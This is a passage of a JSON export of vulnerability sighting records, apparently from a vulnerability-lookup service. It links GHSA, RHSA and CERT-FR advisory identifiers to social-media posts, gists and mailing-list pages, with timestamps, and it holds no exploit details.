"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxm3-wv7p-598c", "type": "seen", "source": "https://gist.github.com/kekru/6017074eaa6aaf08302cd78ef73dc8ca", "content": "", "creation_timestamp": "2025-09-10T19:44:32.000000Z"}, {"uuid": "67200a0b-57e2-4184-80cd-0eb13a78768b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3718", "type": "seen", "source": "https://gist.github.com/anik120/b6fd06c8b70780d542697c63135a086e", "content": "", "creation_timestamp": "2025-11-24T22:38:21.000000Z"}, {"uuid": "696303ba-6631-4bd1-83d0-c06bd0beedc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:3759", "type": "seen", "source": "https://gist.github.com/anik120/b6fd06c8b70780d542697c63135a086e", "content": "", "creation_timestamp": "2025-11-24T22:38:21.000000Z"}, {"uuid": "de2c7340-a9f3-4f64-851e-c744aaed823b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-033", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lw4sbyjjyi2d", "content": "", "creation_timestamp": "2025-08-11T12:28:35.104260Z"}, {"uuid": "ecfb6eb1-20d4-443f-beb2-5a295b881072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-033", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115010129991491304", "content": "", "creation_timestamp": "2025-08-11T12:28:35.567353Z"}, {"uuid": "d4ad2727-4bd1-451a-967c-5fc56f16a5b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6jcc-xgcr-q3h4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115010699412249493", "content": "", "creation_timestamp": "2025-08-11T14:53:23.178244Z"}, {"uuid": "1a2c5a8a-054b-4f2d-98a2-5d35e666d686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c7p4-hx26-pr73", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115010734061130303", "content": "", "creation_timestamp": "2025-08-11T15:02:11.833653Z"}, {"uuid": "b93483ab-11f8-4570-a23f-a596dafc8cc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q63q-pgmf-mxhr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115385569933761680", "content": "", "creation_timestamp": "2025-10-16T19:47:53.038884Z"}, {"uuid": "b60231a3-5967-498e-ace7-efeed54cb683", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rc8-5c8q-jr6j", "type": "seen", "source": "https://infosec.exchange/users/BugBountyShorts/statuses/115408419666821301", "content": "", "creation_timestamp": "2025-10-20T20:38:54.071242Z"}, {"uuid": "7ecf9bec-2fc0-41a0-a785-70998f80a85f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27m7-ffhq-jqrm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115646936118500552", "content": "", "creation_timestamp": "2025-12-01T23:36:46.045911Z"}, {"uuid": "1a0d89ee-49b1-4736-9d5e-8cabaaad7b8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-041", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lzxybqnsqu2o", "content": "", "creation_timestamp": "2025-09-29T12:13:16.860159Z"}, {"uuid": "969dbbb9-3f14-47fa-80f7-4d540ace1c65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jv9m-vf54-chjj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115344571209622398", "content": "", "creation_timestamp": "2025-10-09T14:01:23.263640Z"}, {"uuid": "928d891e-6d85-475c-8219-a821da5429ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9qw-g6rv-3889", "type": "seen", "source": "https://infosec.exchange/users/BugBountyShorts/statuses/115408419667360961", "content": "", "creation_timestamp": "2025-10-20T20:38:54.553274Z"}, {"uuid": "0ddd2d01-3384-4953-a7da-fba7c572ea4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rh7-c77v-6434", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115022897353332451", "content": "", "creation_timestamp": "2025-08-13T18:35:29.489669Z"}, {"uuid": "6ed35249-1ff1-487a-aeae-ce50ec61235e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcxq-v2r3-cc8h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115023986090732902", "content": "", "creation_timestamp": "2025-08-13T23:12:21.813890Z"}, {"uuid": "705da005-7212-4999-882c-a29e8e4f300d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-547r-qmjm-8hvw", "type": "seen", "source": "https://bsky.app/profile/736b.moe/post/3m65jpnbetg2w", "content": "", "creation_timestamp": "2025-11-21T14:49:21.992708Z"}, {"uuid": "f039a330-bbe8-494d-a254-e08d18c98bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xm96-38vj-h28h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115334742402730338", "content": "", "creation_timestamp": "2025-10-07T20:21:46.871188Z"}, {"uuid": "bab846a9-fafe-40ab-a89e-364fbcc5bf9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr92-4q35-4j3m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115249700094592753", "content": "", "creation_timestamp": "2025-09-22T19:54:24.294878Z"}, {"uuid": "0d182558-9161-43f3-bf7c-debad070f96b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-037", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lyd7fyfmfv2w", "content": "", "creation_timestamp": "2025-09-08T12:29:49.266054Z"}, {"uuid": "7ed8769f-a53a-4023-9f36-67fbddfa113d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46xp-26xh-hpqh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115573077428976929", "content": "", "creation_timestamp": "2025-11-18T22:33:30.452359Z"}, {"uuid": "a7106995-59f8-4e4b-a621-5eb9cf692b89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3gcm-f6qx-ff7p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115249756985787179", "content": "", "creation_timestamp": "2025-09-22T20:08:52.247474Z"}, {"uuid": "d4bbd1f4-833f-455d-9372-957a6506f954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46xp-26xh-hpqh", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3m5wsaycr7m22", "content": "", "creation_timestamp": "2025-11-18T22:33:35.932605Z"}, {"uuid": "078b85b5-e9be-4740-9fc9-ac38c3b16627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-039", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lyuxcfx7br2l", "content": "", "creation_timestamp": "2025-09-15T13:52:34.744477Z"}, {"uuid": "b9ddc810-fd88-4371-95e8-f3792edcdbe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8fr4-5q9j-m8gm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115646937108783727", "content": "", "creation_timestamp": "2025-12-01T23:36:59.732958Z"}, {"uuid": "4ad47fbe-fc87-444e-a004-9dfe3d0bf448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6jq-8vc4-79f6", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lz4fxtll3w2m", "content": "", "creation_timestamp": "2025-09-18T13:03:44.094183Z"}, {"uuid": "96f34c46-d8e4-49b7-b945-01403c801199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/308afa54a32c9f1918f70f1cb1bdd50b", "content": "", "creation_timestamp": "2025-09-23T02:51:25.000000Z"}, {"uuid": "59fdaab4-ad00-42a7-8f55-106a983a0618", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/308afa54a32c9f1918f70f1cb1bdd50b", "content": "", "creation_timestamp": "2025-09-23T02:51:25.000000Z"}, {"uuid": "78293800-fa37-4448-9b21-a0faf85cefc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gpmg-4x4g-mr5r", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lwir5k52342l", "content": "", "creation_timestamp": "2025-08-16T06:40:08.822733Z"}, {"uuid": "5b2f5d8f-4740-4a21-8805-bc193c537aa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/308afa54a32c9f1918f70f1cb1bdd50b", "content": "", "creation_timestamp": "2025-09-23T02:51:25.000000Z"}, {"uuid": "41485811-3221-453b-9544-987b3796f7b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8mgj-vmr8-frr6", "type": "seen", "source": "https://bsky.app/profile/tiff.bunny.blue.ap.brid.gy/post/3lydu4p4kadg2", "content": "", "creation_timestamp": "2025-09-08T18:42:32.723928Z"}, {"uuid": "65708a19-4adc-445d-a1ed-80c844db60b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/0588944bf0af8e1132d0c68d1c1d2711", "content": "", "creation_timestamp": "2025-09-23T03:04:11.000000Z"}, {"uuid": "f61fc201-5272-4270-bec8-4d0c22dc7042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/0588944bf0af8e1132d0c68d1c1d2711", "content": "", "creation_timestamp": "2025-09-23T03:04:11.000000Z"}, {"uuid": "b9344373-102f-428c-99ab-d03be32fa7d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4789-qfc9-5f9q", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/17", "content": "", "creation_timestamp": "2025-10-07T19:38:33.000000Z"}, {"uuid": "99b5c2de-1a2a-4b69-954a-69cfc95b82c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-034", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lwofzif6sf2d", "content": "", "creation_timestamp": "2025-08-18T12:36:59.988333Z"}, {"uuid": "83ca269f-b816-4886-b468-2705d10717c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-034", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115049799264599748", "content": "", "creation_timestamp": "2025-08-18T12:37:00.729407Z"}, {"uuid": "27cd8c73-2e98-4554-acd8-9a15dc08ad9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jhpv-4q4f-43g5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115328297904684807", "content": "", "creation_timestamp": "2025-10-06T17:02:51.675431Z"}, {"uuid": "905cc256-dd92-49de-a890-2cf42f0300d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hqr4-4gfc-5p2j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115056886214495468", "content": "", "creation_timestamp": "2025-08-19T18:39:17.677299Z"}, {"uuid": "259f545d-ae5e-4063-aed6-f872e2310211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4mf-mr9h-f27m", "type": "seen", "source": "https://gist.github.com/Anudeepkadambala/88c6065f1de1597be96e50a573cde56e", "content": "", "creation_timestamp": "2025-08-20T02:26:07.000000Z"}, {"uuid": "6c75aabf-a917-4566-9bf0-779aa51c6b5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42m8-jxr4-976p", "type": "seen", "source": "https://gist.github.com/Gamebuster19901/ac7403cdf74d6aed639159539bf5aadf", "content": "", "creation_timestamp": "2025-08-20T03:19:48.000000Z"}, {"uuid": "87f780ea-d76a-44a0-9a7a-888eb2550853", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42m8-jxr4-976p", "type": "seen", "source": "https://gist.github.com/Gamebuster19901/661fc9be6af8beddd7904dd3cff011b3", "content": "", "creation_timestamp": "2025-08-20T03:23:54.000000Z"}, {"uuid": "1c535162-7e77-4bd9-b11f-ff118ff2980d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrpp-h998-j3pp", "type": "seen", "source": "https://gist.github.com/threhan/948d463707e059446276b0f620bc6e3e", "content": "", "creation_timestamp": "2025-11-10T08:55:45.000000Z"}, {"uuid": "47d1f7a3-7d11-4abc-87f5-a081a5574437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "4346a482-b4af-49b8-a0ff-8ce946efe50d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "7a13ca3d-800b-4472-a2e5-f74e24fd6cdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "d4b7e5a1-7a1d-4431-ac3e-62cfae4c3ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "2389271b-e9bd-4772-8244-918332c3bb37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-009", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3ltf3q737ud2o", "content": "", "creation_timestamp": "2025-07-07T15:23:18.097262Z"}, {"uuid": "cff61c1b-fd53-40ba-bb9a-8099fa9e4204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "ce766cf7-d111-4728-9753-c3e99a140fac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "58cd82e5-8e11-44f5-878e-d26c12cebe82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/811699bcd24fb9c9b20f9d70743bfff9", "content": "", "creation_timestamp": "2025-07-16T05:25:32.000000Z"}, {"uuid": "392c9a58-b684-402d-887d-c9297401367c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cmxj-wx9v-52qr", "type": "seen", "source": "https://gist.github.com/safer-bot/e9d5252cf350a9514cc3b81edb9d24d8", "content": "", "creation_timestamp": "2025-07-16T09:39:31.000000Z"}, {"uuid": "c61b7f0a-2747-46be-b7d7-7a5a011ec12a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-009", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114812636180887464", "content": "", "creation_timestamp": "2025-07-07T15:23:19.649606Z"}, {"uuid": "69b439ed-f71a-4088-880f-47368760d812", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-027", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lst5y37vvg26", "content": "", "creation_timestamp": "2025-06-30T12:15:34.718804Z"}, {"uuid": "40a8a073-9b10-42d8-9ece-febc6d7587be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-027", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114772261835133895", "content": "", "creation_timestamp": "2025-06-30T12:15:35.846643Z"}, {"uuid": "bc37e73b-c7e1-4f7b-9767-253345a978ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/fb69a4cda9a7f0b4808b4f12ca5bb304", "content": "", "creation_timestamp": "2025-07-16T05:25:00.000000Z"}, {"uuid": "9d091aaa-f90f-42ad-bf48-6bd4d768d289", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34rf-485x-g5h7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114830395993184387", "content": "", "creation_timestamp": "2025-07-10T18:39:51.529806Z"}, {"uuid": "02f14f4c-0af3-451a-9126-413b871ef752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GW-9WW9-JMC3", "type": "seen", "source": "https://t.me/brutsecurity/1837", "content": "", "creation_timestamp": "2026-07-10T00:00:32.033390Z"}, {"uuid": "1a220802-98c5-4ecf-af33-93d7f893a4bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g98g-r7gf-2r25", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114514077067044674", "content": "", "creation_timestamp": "2025-05-15T21:55:47.352545Z"}, {"uuid": "33d8c59a-5d44-4e3d-a930-3e79e05ba83d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9wg9-93h9-j8ch", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114514077067044674", "content": "", "creation_timestamp": "2025-05-15T21:55:47.451237Z"}, {"uuid": "fc680377-1553-4d53-b52e-b4cddb212536", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9fwj-9mjf-rhj3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114514077067044674", "content": "", "creation_timestamp": "2025-05-15T21:55:47.547262Z"}, {"uuid": "34bb9aa0-18d0-4428-8f16-633ec4ab9aff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f4r-34m4-3w8q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114514077067044674", "content": "", "creation_timestamp": "2025-05-15T21:55:47.644081Z"}, {"uuid": "7e147094-405a-44a2-b1ba-d67748258ee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47m2-26rw-j2jw", "type": "seen", "source": "https://bsky.app/profile/andrewnez.mastodon.social.ap.brid.gy/post/3lr253dgeazj2", "content": "", "creation_timestamp": "2025-06-07T19:58:28.484031Z"}, {"uuid": "d6d4ff78-78dc-42b0-8b32-9beefa23c0ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/18d045022cfb5b87cb97f499172790c7", "content": "", "creation_timestamp": "2025-07-16T14:48:39.000000Z"}, {"uuid": "2e6ef46e-7025-464b-a74b-6a8043fb2616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/18d045022cfb5b87cb97f499172790c7", "content": "", "creation_timestamp": "2025-07-16T14:48:39.000000Z"}, {"uuid": "646f7166-4838-4d03-a344-81a0dbf069a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/18d045022cfb5b87cb97f499172790c7", "content": "", "creation_timestamp": "2025-07-16T14:48:39.000000Z"}, {"uuid": "1b0676ab-75c8-49bd-a942-c6c296d038ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/18d045022cfb5b87cb97f499172790c7", "content": "", "creation_timestamp": "2025-07-16T14:48:39.000000Z"}, {"uuid": "2f9120ff-7498-4eb0-85e3-c6d4bc22c51c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/18d045022cfb5b87cb97f499172790c7", "content": "", "creation_timestamp": "2025-07-16T14:48:39.000000Z"}, {"uuid": "893c3986-203a-4ae9-9875-688f3a7c6a20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/18d045022cfb5b87cb97f499172790c7", "content": "", "creation_timestamp": "2025-07-16T14:48:39.000000Z"}, {"uuid": "43db2c2b-d525-4bbc-8d03-cbed96814c80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/734c158dc9fd70a14de1e01ddc9f4b39", "content": "", "creation_timestamp": "2025-07-16T14:51:43.000000Z"}, {"uuid": "3117d19f-dce5-4486-ba9f-0138ede57805", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/9f55532facee081b54fe60dd276f03f5", "content": "", "creation_timestamp": "2025-07-16T14:54:05.000000Z"}, {"uuid": "1dd5ba23-f8a5-4332-a737-d036a644db34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-6h5g-97j2", "type": "seen", "source": "https://gist.github.com/safer-bot/ff8de1b4cdd1b449152c518c79ee65f5", "content": "", "creation_timestamp": "2025-07-16T14:58:16.000000Z"}, {"uuid": "ac70c572-ed6d-467e-a9da-a018c0215c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/neuralmarkets.substack.com/post/3lygu6a5ixi2d", "content": "", "creation_timestamp": "2025-09-09T23:19:17.017278Z"}, {"uuid": "3e53a73f-2699-41b8-b4be-ba6375cd7bec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54j7-grvr-9xwg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115265269823527423", "content": "", "creation_timestamp": 